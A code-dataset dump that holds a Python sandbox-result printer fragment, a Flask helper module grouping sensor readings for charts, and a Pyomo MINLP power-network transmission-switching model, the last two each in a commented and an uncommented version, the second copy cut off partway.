                print('\t\t[{}]'.format(','.join(list([VerboseOutput._stringifyTestCaseResult(result) for result in vec.result]))))
        return buf.getvalue().strip()

    @staticmethod
    def InvokeCustomSandbox(response):
        '''
        Verbose output printer for InvokeCustomSandbox() RPC results
        '''
        buf = io.StringIO()
        with redirect_stdout(buf):
            print('Invoke custom sandbox results:')
            print('\tError: {}'.format(response.error))
            print('\tstdout: {}'.format(response.stdout))
            print('\tstderr: {}'.format(response.stderr))
        return buf.getvalue().strip()
| 0 | 3,685 | 23 |
5228d1bb504d38bdf6aaa7f03736262ba215e1e0 | 1,618 | py | Python | app/data/func.py | stanmain/IION-Flask-Test | ddd68706ee06eacb17ad461a9d31087b87217769 | [
"MIT"
] | null | null | null | app/data/func.py | stanmain/IION-Flask-Test | ddd68706ee06eacb17ad461a9d31087b87217769 | [
"MIT"
] | null | null | null | app/data/func.py | stanmain/IION-Flask-Test | ddd68706ee06eacb17ad461a9d31087b87217769 | [
"MIT"
] | null | null | null | # Copyright © 2018 Stanislav Hnatiuk. All rights reserved.
"""Module of functions."""
from operator import itemgetter
from itertools import groupby
def stime_to_decimal(s):
    """Convert a time-of-day value to decimal hours (e.g. 10:30 -> 10.5).

    *s* must expose ``hour`` and ``minute`` attributes (``datetime.time``-like);
    seconds are ignored.
    """
    fractional_hours = s.minute / 60
    return s.hour + fractional_hours
def group_time(records):
    """Build chart rows from measurement tuples.

    Sorts *records* in place by (time, sensor) -- indices 6 and 1 -- then
    emits one row per distinct time: ``[decimal_hours, value, value, ...]``
    where each value is the tuple's index-0 field.
    """
    records.sort(key=itemgetter(6, 1))
    rows = []
    for moment, bucket in groupby(records, key=itemgetter(6)):
        rows.append([stime_to_decimal(moment)] + [entry[0] for entry in bucket])
    return rows
def group_sensor(records):
    """Build the chart header row: 'X' followed by one label per sensor.

    Sorts *records* in place by index 1 (sensor key) and takes index 2
    (the label) from each distinct (index-1, index-2) pair, in order.
    """
    records.sort(key=itemgetter(1))
    labels = ['X']
    for pair, _ in groupby(records, key=itemgetter(1, 2)):
        labels.append(pair[1])
    return labels
def group_category(records):
    """Group measurement tuples by category and attach chart data.

    Sorts *records* in place by index 3 (category id), groups by the
    (id, name, measure) triple at indices 3-5, and returns one dict per
    category with ``rows`` (from :func:`group_time`) and ``cols`` (from
    :func:`group_sensor`) computed over that category's records.
    """
    records.sort(key=itemgetter(3))
    categories = []
    for key, bucket in groupby(records, key=itemgetter(3, 4, 5)):
        cat_id, cat_name, cat_measure = key
        categories.append({
            'id': cat_id,
            'name': cat_name,
            'measure': cat_measure,
            'data': list(bucket),
        })
    for entry in categories:
        entry['rows'] = group_time(entry['data'])
        entry['cols'] = group_sensor(entry['data'])
        # The raw tuples are only needed to derive rows/cols above.
        entry.pop('data')
    return categories
# [
# {
# "cols": [
# "X",
# "Sens 1",
# "Sens 2"
# ],
# "id": 1,
# "measure": "AAA",
# "name": "Cat 1",
# "rows": [
# [
# 10.916666666666666,
# 17.0,
# 14.0
# ]
# ]
# },
# {
# "cols": [
# "X",
# "Sens 3"
# ],
# "id": 2,
# "measure": "AAA",
# "name": "Cat 2",
# "rows": [
# [
# 10.916666666666666,
# 13.0
# ]
# ]
# }
# ] | 19.731707 | 66 | 0.487639 | # Copyright © 2018 Stanislav Hnatiuk. All rights reserved.
"""Module of functions."""
from operator import itemgetter
from itertools import groupby
def stime_to_decimal(s):
"""Lololo."""
return s.hour + s.minute / 60
def group_time(records):
"""Lololo."""
records.sort(key=itemgetter(6, 1))
result = [
[stime_to_decimal(time), *[item[0] for item in group]]
for time, group in groupby(records, key=itemgetter(6))
]
return result
def group_sensor(records):
"""Lololo."""
records.sort(key=itemgetter(1))
result = ['X', *[key[1] for key, _ in groupby(
records, key=itemgetter(1, 2))]]
return result
def group_category(records):
"""Lololo."""
records.sort(key=itemgetter(3))
result = [{
'id': key[0],
'name': key[1],
'measure': key[2],
'data': [*[item for item in group]],
} for key, group in groupby(records, key=itemgetter(3, 4, 5))]
for item in result:
item['rows'] = group_time(item['data'])
item['cols'] = group_sensor(item['data'])
item.pop('data')
return result
# [
# {
# "cols": [
# "X",
# "Sens 1",
# "Sens 2"
# ],
# "id": 1,
# "measure": "AAA",
# "name": "Cat 1",
# "rows": [
# [
# 10.916666666666666,
# 17.0,
# 14.0
# ]
# ]
# },
# {
# "cols": [
# "X",
# "Sens 3"
# ],
# "id": 2,
# "measure": "AAA",
# "name": "Cat 2",
# "rows": [
# [
# 10.916666666666666,
# 13.0
# ]
# ]
# }
# ] | 0 | 0 | 0 |
83f168eee9b74da62f383dcf9b275bd1bf380a28 | 15,770 | py | Python | tests/examples/minlplib/transswitch0009p.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 2 | 2021-07-03T13:19:10.000Z | 2022-02-06T10:48:13.000Z | tests/examples/minlplib/transswitch0009p.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 1 | 2021-07-04T14:52:14.000Z | 2021-07-15T10:17:11.000Z | tests/examples/minlplib/transswitch0009p.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | null | null | null | # MINLP written by GAMS Convert at 04/21/18 13:54:56
#
# Equation counts
# Total E G L N X C B
# 140 56 33 51 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 70 61 9 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 401 182 219 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
# Single shared model object; 'm' is the short alias used throughout this
# machine-generated (GAMS Convert) script.
model = m = ConcreteModel()
# x1-x9 enter the sin()/cos() flow expressions below and are boxed to
# [0.9, 1.1] by c68-c85 (presumably per-bus voltage magnitudes -- confirm
# against the MINLPLib source model).
m.x1 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(None,None),initialize=0)
# x10-x45 are defined (via the == 0 constraints c2-c37) as the values of the
# binary-gated trig expressions, and are magnitude-limited pairwise in c38-c55.
m.x10 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(None,None),initialize=0)
# x46-x54 appear only inside sin()/cos() differences; pairwise differences are
# limited to +/-0.26 by c86-c121 and x46 is fixed to 0 by c122 (presumably
# bus phase angles with x46 as the reference -- confirm).
m.x46 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(None,None),initialize=0)
# b55-b63: one binary per gated branch; each multiplies a pair of flow
# expressions in c2-c37, zeroing them when the binary is 0 (presumably line
# on/off switching, per the model name "transswitch" -- confirm).
m.b55 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b56 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b57 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b58 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b59 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b60 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b61 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b62 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
# x64-x69: auxiliaries equated to selected flow variables in c123-c128 and
# bounded in c56-c67; only x64-x66 carry cost in the objective.
m.x64 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x65 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x66 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(None,None),initialize=0)
# Minimize a quadratic cost in x64-x66 plus the constant offset 1085.
m.obj = Objective(expr=1100*m.x64**2 + 500*m.x64 + 850*m.x65**2 + 120*m.x65 + 1225*m.x66**2 + 100*m.x66
                       + 1085, sense=minimize)
# c2-c37: nonlinear trig flow expressions, each multiplied by its binary
# switch so the flow variable (x10-x45) is forced to 0 when the switch is off.
m.c2 = Constraint(expr=-17.0648464163823*m.x3*m.x6*sin(m.x48 - m.x51)*m.b55 + m.x10 == 0)
m.c3 = Constraint(expr=-17.0648464163823*m.x6*m.x3*sin(m.x51 - m.x48)*m.b55 + m.x11 == 0)
m.c4 = Constraint(expr=-(1.61712247324614*m.x7**2 - 1.61712247324614*m.x7*m.x8*cos(m.x52 - m.x53) + 13.6979785969084*
                       m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x12 == 0)
m.c5 = Constraint(expr=-(1.61712247324614*m.x8**2 - 1.61712247324614*m.x8*m.x7*cos(m.x53 - m.x52) + 13.6979785969084*
                       m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x13 == 0)
m.c6 = Constraint(expr=-(1.28200913842411*m.x5**2 - 1.28200913842411*m.x5*m.x6*cos(m.x50 - m.x51) + 5.58824496236153*
                       m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x14 == 0)
m.c7 = Constraint(expr=-(1.28200913842411*m.x6**2 - 1.28200913842411*m.x6*m.x5*cos(m.x51 - m.x50) + 5.58824496236153*
                       m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x15 == 0)
m.c8 = Constraint(expr=-(1.1550874808901*m.x6**2 - 1.1550874808901*m.x6*m.x7*cos(m.x51 - m.x52) + 9.78427042636317*m.x6*
                       m.x7*sin(m.x51 - m.x52))*m.b58 + m.x16 == 0)
m.c9 = Constraint(expr=-(1.1550874808901*m.x7**2 - 1.1550874808901*m.x7*m.x6*cos(m.x52 - m.x51) + 9.78427042636317*m.x7*
                       m.x6*sin(m.x52 - m.x51))*m.b58 + m.x17 == 0)
m.c10 = Constraint(expr=-16*m.x8*m.x2*sin(m.x53 - m.x47)*m.b59 + m.x18 == 0)
m.c11 = Constraint(expr=-16*m.x2*m.x8*sin(m.x47 - m.x53)*m.b59 + m.x19 == 0)
m.c12 = Constraint(expr=-(1.94219124871473*m.x4**2 - 1.94219124871473*m.x4*m.x5*cos(m.x49 - m.x50) + 10.5106820518679*
                        m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x20 == 0)
m.c13 = Constraint(expr=-(1.94219124871473*m.x5**2 - 1.94219124871473*m.x5*m.x4*cos(m.x50 - m.x49) + 10.5106820518679*
                        m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x21 == 0)
m.c14 = Constraint(expr=-17.3611111111111*m.x1*m.x4*sin(m.x46 - m.x49)*m.b61 + m.x22 == 0)
m.c15 = Constraint(expr=-17.3611111111111*m.x4*m.x1*sin(m.x49 - m.x46)*m.b61 + m.x23 == 0)
m.c16 = Constraint(expr=-(1.36518771331058*m.x9**2 - 1.36518771331058*m.x9*m.x4*cos(m.x54 - m.x49) + 11.6040955631399*
                        m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x24 == 0)
m.c17 = Constraint(expr=-(1.36518771331058*m.x4**2 - 1.36518771331058*m.x4*m.x9*cos(m.x49 - m.x54) + 11.6040955631399*
                        m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x25 == 0)
m.c18 = Constraint(expr=-(1.18760437929115*m.x8**2 - 1.18760437929115*m.x8*m.x9*cos(m.x53 - m.x54) + 5.97513453330859*
                        m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x26 == 0)
m.c19 = Constraint(expr=-(1.18760437929115*m.x9**2 - 1.18760437929115*m.x9*m.x8*cos(m.x54 - m.x53) + 5.97513453330859*
                        m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x27 == 0)
m.c20 = Constraint(expr=-(17.0648464163823*m.x3**2 - 17.0648464163823*m.x3*m.x6*cos(m.x48 - m.x51))*m.b55 + m.x28 == 0)
m.c21 = Constraint(expr=-(17.0648464163823*m.x6**2 - 17.0648464163823*m.x6*m.x3*cos(m.x51 - m.x48))*m.b55 + m.x29 == 0)
m.c22 = Constraint(expr=-(13.6234785969084*m.x7**2 - 13.6979785969084*m.x7*m.x8*cos(m.x52 - m.x53) - 1.61712247324614*
                        m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x30 == 0)
m.c23 = Constraint(expr=-(13.6234785969084*m.x8**2 - 13.6979785969084*m.x8*m.x7*cos(m.x53 - m.x52) - 1.61712247324614*
                        m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x31 == 0)
m.c24 = Constraint(expr=-(5.40924496236153*m.x5**2 - 5.58824496236153*m.x5*m.x6*cos(m.x50 - m.x51) - 1.28200913842411*
                        m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x32 == 0)
m.c25 = Constraint(expr=-(5.40924496236153*m.x6**2 - 5.58824496236153*m.x6*m.x5*cos(m.x51 - m.x50) - 1.28200913842411*
                        m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x33 == 0)
m.c26 = Constraint(expr=-(9.67977042636317*m.x6**2 - 9.78427042636317*m.x6*m.x7*cos(m.x51 - m.x52) - 1.1550874808901*
                        m.x6*m.x7*sin(m.x51 - m.x52))*m.b58 + m.x34 == 0)
m.c27 = Constraint(expr=-(9.67977042636317*m.x7**2 - 9.78427042636317*m.x7*m.x6*cos(m.x52 - m.x51) - 1.1550874808901*
                        m.x7*m.x6*sin(m.x52 - m.x51))*m.b58 + m.x35 == 0)
m.c28 = Constraint(expr=-(16*m.x8**2 - 16*m.x8*m.x2*cos(m.x53 - m.x47))*m.b59 + m.x36 == 0)
m.c29 = Constraint(expr=-(16*m.x2**2 - 16*m.x2*m.x8*cos(m.x47 - m.x53))*m.b59 + m.x37 == 0)
m.c30 = Constraint(expr=-(10.4316820518679*m.x4**2 - 10.5106820518679*m.x4*m.x5*cos(m.x49 - m.x50) - 1.94219124871473*
                        m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x38 == 0)
m.c31 = Constraint(expr=-(10.4316820518679*m.x5**2 - 10.5106820518679*m.x5*m.x4*cos(m.x50 - m.x49) - 1.94219124871473*
                        m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x39 == 0)
m.c32 = Constraint(expr=-(17.3611111111111*m.x1**2 - 17.3611111111111*m.x1*m.x4*cos(m.x46 - m.x49))*m.b61 + m.x40 == 0)
m.c33 = Constraint(expr=-(17.3611111111111*m.x4**2 - 17.3611111111111*m.x4*m.x1*cos(m.x49 - m.x46))*m.b61 + m.x41 == 0)
m.c34 = Constraint(expr=-(11.5160955631399*m.x9**2 - 11.6040955631399*m.x9*m.x4*cos(m.x54 - m.x49) - 1.36518771331058*
                        m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x42 == 0)
m.c35 = Constraint(expr=-(11.5160955631399*m.x4**2 - 11.6040955631399*m.x4*m.x9*cos(m.x49 - m.x54) - 1.36518771331058*
                        m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x43 == 0)
m.c36 = Constraint(expr=-(5.82213453330859*m.x8**2 - 5.97513453330859*m.x8*m.x9*cos(m.x53 - m.x54) - 1.18760437929115*
                        m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x44 == 0)
m.c37 = Constraint(expr=-(5.82213453330859*m.x9**2 - 5.97513453330859*m.x9*m.x8*cos(m.x54 - m.x53) - 1.18760437929115*
                        m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x45 == 0)
# c38-c55: quadratic magnitude limits x_a**2 + x_b**2 <= limit on each flow pair.
m.c38 = Constraint(expr=m.x10**2 + m.x28**2 <= 9)
m.c39 = Constraint(expr=m.x11**2 + m.x29**2 <= 9)
m.c40 = Constraint(expr=m.x12**2 + m.x30**2 <= 6.25)
m.c41 = Constraint(expr=m.x13**2 + m.x31**2 <= 6.25)
m.c42 = Constraint(expr=m.x14**2 + m.x32**2 <= 2.25)
m.c43 = Constraint(expr=m.x15**2 + m.x33**2 <= 2.25)
m.c44 = Constraint(expr=m.x16**2 + m.x34**2 <= 2.25)
m.c45 = Constraint(expr=m.x17**2 + m.x35**2 <= 2.25)
m.c46 = Constraint(expr=m.x18**2 + m.x36**2 <= 6.25)
m.c47 = Constraint(expr=m.x19**2 + m.x37**2 <= 6.25)
m.c48 = Constraint(expr=m.x20**2 + m.x38**2 <= 6.25)
m.c49 = Constraint(expr=m.x21**2 + m.x39**2 <= 6.25)
m.c50 = Constraint(expr=m.x22**2 + m.x40**2 <= 6.25)
m.c51 = Constraint(expr=m.x23**2 + m.x41**2 <= 6.25)
m.c52 = Constraint(expr=m.x24**2 + m.x42**2 <= 6.25)
m.c53 = Constraint(expr=m.x25**2 + m.x43**2 <= 6.25)
m.c54 = Constraint(expr=m.x26**2 + m.x44**2 <= 6.25)
m.c55 = Constraint(expr=m.x27**2 + m.x45**2 <= 6.25)
# c56-c67: bounds on the auxiliaries x64-x69 (expressed as constraints rather
# than Var bounds, as emitted by GAMS Convert).
m.c56 = Constraint(expr= m.x64 <= 2.5)
m.c57 = Constraint(expr= m.x65 <= 3)
m.c58 = Constraint(expr= m.x66 <= 2.7)
m.c59 = Constraint(expr= m.x64 >= 0.1)
m.c60 = Constraint(expr= m.x65 >= 0.1)
m.c61 = Constraint(expr= m.x66 >= 0.1)
m.c62 = Constraint(expr= m.x67 <= 3)
m.c63 = Constraint(expr= m.x68 <= 3)
m.c64 = Constraint(expr= m.x69 <= 3)
m.c65 = Constraint(expr= m.x67 >= -3)
m.c66 = Constraint(expr= m.x68 >= -3)
m.c67 = Constraint(expr= m.x69 >= -3)
# c68-c85: box bounds 0.9 <= x1..x9 <= 1.1.
m.c68 = Constraint(expr= m.x1 <= 1.1)
m.c69 = Constraint(expr= m.x2 <= 1.1)
m.c70 = Constraint(expr= m.x3 <= 1.1)
m.c71 = Constraint(expr= m.x4 <= 1.1)
m.c72 = Constraint(expr= m.x5 <= 1.1)
m.c73 = Constraint(expr= m.x6 <= 1.1)
m.c74 = Constraint(expr= m.x7 <= 1.1)
m.c75 = Constraint(expr= m.x8 <= 1.1)
m.c76 = Constraint(expr= m.x9 <= 1.1)
m.c77 = Constraint(expr= m.x1 >= 0.9)
m.c78 = Constraint(expr= m.x2 >= 0.9)
m.c79 = Constraint(expr= m.x3 >= 0.9)
m.c80 = Constraint(expr= m.x4 >= 0.9)
m.c81 = Constraint(expr= m.x5 >= 0.9)
m.c82 = Constraint(expr= m.x6 >= 0.9)
m.c83 = Constraint(expr= m.x7 >= 0.9)
m.c84 = Constraint(expr= m.x8 >= 0.9)
m.c85 = Constraint(expr= m.x9 >= 0.9)
# c86-c121: |x_i - x_j| <= 0.26 on the coupled x46-x54 pairs, written as two
# one-sided inequalities per pair in each direction.
m.c86 = Constraint(expr= m.x48 - m.x51 >= -0.26)
m.c87 = Constraint(expr= - m.x48 + m.x51 >= -0.26)
m.c88 = Constraint(expr= m.x52 - m.x53 >= -0.26)
m.c89 = Constraint(expr= - m.x52 + m.x53 >= -0.26)
m.c90 = Constraint(expr= m.x50 - m.x51 >= -0.26)
m.c91 = Constraint(expr= - m.x50 + m.x51 >= -0.26)
m.c92 = Constraint(expr= m.x51 - m.x52 >= -0.26)
m.c93 = Constraint(expr= - m.x51 + m.x52 >= -0.26)
m.c94 = Constraint(expr= - m.x47 + m.x53 >= -0.26)
m.c95 = Constraint(expr= m.x47 - m.x53 >= -0.26)
m.c96 = Constraint(expr= m.x49 - m.x50 >= -0.26)
m.c97 = Constraint(expr= - m.x49 + m.x50 >= -0.26)
m.c98 = Constraint(expr= m.x46 - m.x49 >= -0.26)
m.c99 = Constraint(expr= - m.x46 + m.x49 >= -0.26)
m.c100 = Constraint(expr= - m.x49 + m.x54 >= -0.26)
m.c101 = Constraint(expr= m.x49 - m.x54 >= -0.26)
m.c102 = Constraint(expr= m.x53 - m.x54 >= -0.26)
m.c103 = Constraint(expr= - m.x53 + m.x54 >= -0.26)
m.c104 = Constraint(expr= m.x48 - m.x51 <= 0.26)
m.c105 = Constraint(expr= - m.x48 + m.x51 <= 0.26)
m.c106 = Constraint(expr= m.x52 - m.x53 <= 0.26)
m.c107 = Constraint(expr= - m.x52 + m.x53 <= 0.26)
m.c108 = Constraint(expr= m.x50 - m.x51 <= 0.26)
m.c109 = Constraint(expr= - m.x50 + m.x51 <= 0.26)
m.c110 = Constraint(expr= m.x51 - m.x52 <= 0.26)
m.c111 = Constraint(expr= - m.x51 + m.x52 <= 0.26)
m.c112 = Constraint(expr= - m.x47 + m.x53 <= 0.26)
m.c113 = Constraint(expr= m.x47 - m.x53 <= 0.26)
m.c114 = Constraint(expr= m.x49 - m.x50 <= 0.26)
m.c115 = Constraint(expr= - m.x49 + m.x50 <= 0.26)
m.c116 = Constraint(expr= m.x46 - m.x49 <= 0.26)
m.c117 = Constraint(expr= - m.x46 + m.x49 <= 0.26)
m.c118 = Constraint(expr= - m.x49 + m.x54 <= 0.26)
m.c119 = Constraint(expr= m.x49 - m.x54 <= 0.26)
m.c120 = Constraint(expr= m.x53 - m.x54 <= 0.26)
m.c121 = Constraint(expr= - m.x53 + m.x54 <= 0.26)
# c122 pins the reference x46 to 0; c123-c128 equate the auxiliaries x64-x69
# to selected flow variables; c129-c140 are linear balance equations over the
# remaining flows.
m.c122 = Constraint(expr= m.x46 == 0)
m.c123 = Constraint(expr= m.x22 - m.x64 == 0)
m.c124 = Constraint(expr= m.x19 - m.x65 == 0)
m.c125 = Constraint(expr= m.x10 - m.x66 == 0)
m.c126 = Constraint(expr= m.x40 - m.x67 == 0)
m.c127 = Constraint(expr= m.x37 - m.x68 == 0)
m.c128 = Constraint(expr= m.x28 - m.x69 == 0)
m.c129 = Constraint(expr= m.x20 + m.x23 + m.x25 == 0)
m.c130 = Constraint(expr= m.x14 + m.x21 == -0.9)
m.c131 = Constraint(expr= m.x11 + m.x15 + m.x16 == 0)
m.c132 = Constraint(expr= m.x12 + m.x17 == -1)
m.c133 = Constraint(expr= m.x13 + m.x18 + m.x26 == 0)
m.c134 = Constraint(expr= m.x24 + m.x27 == -1.25)
m.c135 = Constraint(expr= m.x38 + m.x41 + m.x43 == 0)
m.c136 = Constraint(expr= m.x32 + m.x39 == -0.3)
m.c137 = Constraint(expr= m.x29 + m.x33 + m.x34 == 0)
m.c138 = Constraint(expr= m.x30 + m.x35 == -0.35)
m.c139 = Constraint(expr= m.x31 + m.x36 + m.x44 == 0)
m.c140 = Constraint(expr= m.x42 + m.x45 == -0.5)
| 39.52381 | 120 | 0.603995 | # MINLP written by GAMS Convert at 04/21/18 13:54:56
#
# Equation counts
# Total E G L N X C B
# 140 56 33 51 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 70 61 9 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 401 182 219 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(None,None),initialize=0)
m.b55 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b56 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b57 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b58 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b59 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b60 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b61 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b62 = Var(within=Binary,bounds=(0,1),initialize=0)
